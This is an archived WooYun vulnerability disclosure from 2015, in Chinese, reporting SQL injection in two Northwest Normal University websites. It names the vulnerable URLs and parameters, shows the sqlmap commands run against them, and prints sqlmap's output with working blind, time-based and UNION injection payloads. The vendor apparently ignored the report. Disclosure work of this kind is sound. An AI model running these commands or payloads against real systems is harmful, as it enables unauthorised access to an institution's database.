乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-13: 细节已通知厂商并且等待厂商处理中 2015-08-18: 厂商已经主动忽略漏洞,细节向公众公开
我爱高校~~
没有深入 只是大概扫了一下 get2个注射点1:http://www.nwnu.edu.cn/cate.do?dept=0018注射点2:http://eduyun.nwnu.edu.cn/websites/index.php?g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043&id=1000077&channelid=1000079&articleid=1001198
python sqlmap.py -u "http://www.nwnu.edu.cn/cate.do?dept=0018"
---Parameter: dept (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: dept=0018' AND 6007=6007 AND 'WyuN'='WyuN---
[01:30:29] [INFO] the back-end DBMS is MySQLweb application technology: JSPback-end DBMS: MySQL >= 5.0.2
python sqlmap.py -u "http://eduyun.nwnu.edu.cn/websites/index.php?g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043&id=1000077&channelid=1000079&articleid=1001198"
sqlmap identified the following injection point(s) with a total of 1211 HTTP(s) requests:---Parameter: articleid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043&id=1000077&channelid=1000079&articleid=1001198) AND 2163=2163 AND (2552=2552 Type: UNION query Title: Generic UNION query (88) - 6 columns Payload: g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043&id=1000077&channelid=1000079&articleid=-3457) UNION ALL SELECT 88,88,88,88,88,CONCAT(0x716b717871,0x4e4d624f6d4952786350,0x71626b6b71)-- Parameter: webid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043) AND 3194=3194 AND (9197=9197&id=1000077&channelid=1000079&articleid=1001198 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043) AND (SELECT * FROM (SELECT(SLEEP(5)))nfLB) AND (7937=7937&id=1000077&channelid=1000079&articleid=1001198 Type: UNION query Title: Generic UNION query (88) - 3 columns Payload: g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=-1937) UNION ALL SELECT 88,CONCAT(0x716b717871,0x47536b505553534a4e47,0x71626b6b71),88-- &id=1000077&channelid=1000079&articleid=1001198Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043&id=1000077) AND 4550=4550 AND (8947=8947&channelid=1000079&articleid=1001198---there were multiple injection points, please select the one to use for following injections:[0] place: GET, parameter: webid, type: Unescaped numeric (default)[1] place: GET, parameter: id, type: Unescaped numeric[2] place: GET, parameter: articleid, type: Unescaped numeric[q] Quit
后面这个没有再进一步,只是给出证明
你懂~~
危害等级:无影响厂商忽略
忽略时间:2015-08-18 22:44
暂无